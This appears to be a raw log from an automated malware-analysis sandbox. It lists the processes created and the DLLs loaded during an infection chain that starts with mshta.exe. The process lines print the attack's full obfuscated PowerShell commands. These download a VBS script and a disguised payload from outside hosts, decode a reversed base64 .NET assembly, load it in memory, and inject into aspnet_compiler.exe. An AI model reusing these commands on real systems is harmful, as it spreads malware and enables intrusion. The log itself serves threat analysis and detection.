Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
